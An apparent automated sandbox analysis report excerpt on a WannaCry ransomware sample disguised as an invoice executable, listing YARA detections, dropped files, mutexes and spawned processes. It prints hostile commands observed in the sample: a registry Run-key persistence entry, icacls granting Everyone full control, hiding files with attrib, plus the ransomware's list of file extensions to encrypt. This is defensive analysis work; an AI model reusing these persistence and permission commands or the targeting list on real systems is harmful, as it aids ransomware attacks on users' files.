            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEFEA0086_2_6CEFEA00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEA4BE086_2_6CEA4BE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE7EB6086_2_6CE7EB60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF44F086_2_6CEF44F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBC4B086_2_6CEBC4B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE9248086_2_6CE92480
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED444086_2_6CED4440
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5442086_2_6CE54420
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7241086_2_6CF72410
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF405F086_2_6CF405F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5A5A086_2_6CE5A5A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE425B286_2_6CE425B2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE3657986_2_6CE36579
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3E55086_2_6CF3E550
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7854086_2_6CF78540
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7C52086_2_6CF7C520
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF2E6F086_2_6CF2E6F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF466E086_2_6CF466E0
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe.8.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
            Source: taskdl.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: libeay32.dll.59.drStatic PE information: Number of sections : 18 > 10
            Source: libssp-0.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: libevent-2-0-5.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: ssleay32.dll.59.drStatic PE information: Number of sections : 18 > 10
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.unpack, type: UNPACKEDPEMatched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
            Source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\Desktop\118491705402797.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2348355194.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2289319382.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe.10.drBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\AppData\Local\Temp\Program Files (x86)\Program Files\WINDOWS\ProgramData\Intel$\CloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
            Source: classification engineClassification label: mal100.rans.spyw.evad.winZIP@985/1012@0/6
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10005190 GetDriveTypeW,GlobalAlloc,CreateFileW,GlobalFree,GetDriveTypeW,MoveFileExW,Sleep,GetDiskFreeSpaceExW,WriteFile,Sleep,Sleep,GlobalFree,FlushFileBuffers,CloseHandle,DeleteFileW,10_2_10005190
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zipJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeMutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2184:120:WilError_03
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\All Users\Microsoft\Windows\WER\Temp\~SD4A37.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 118491705402797.bat
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
            Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.ini
            Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include/psdk_inc
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/ssl/private
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/ssl/certs
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/ssl
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/lib/engines
            Source: taskhsvc.exeString found in binary or memory: OPENSSLDIR: "/home/ubuntu/install/openssl/ssl"
            Source: taskhsvc.exeString found in binary or memory: ../../gcc-5.1.0/libgcc/soft-fp/addtf3.c
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include/sys
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap4588:126:7zEvent8780
            Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap12385:118:7zEvent28652
            Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe"
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 118491705402797.bat
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
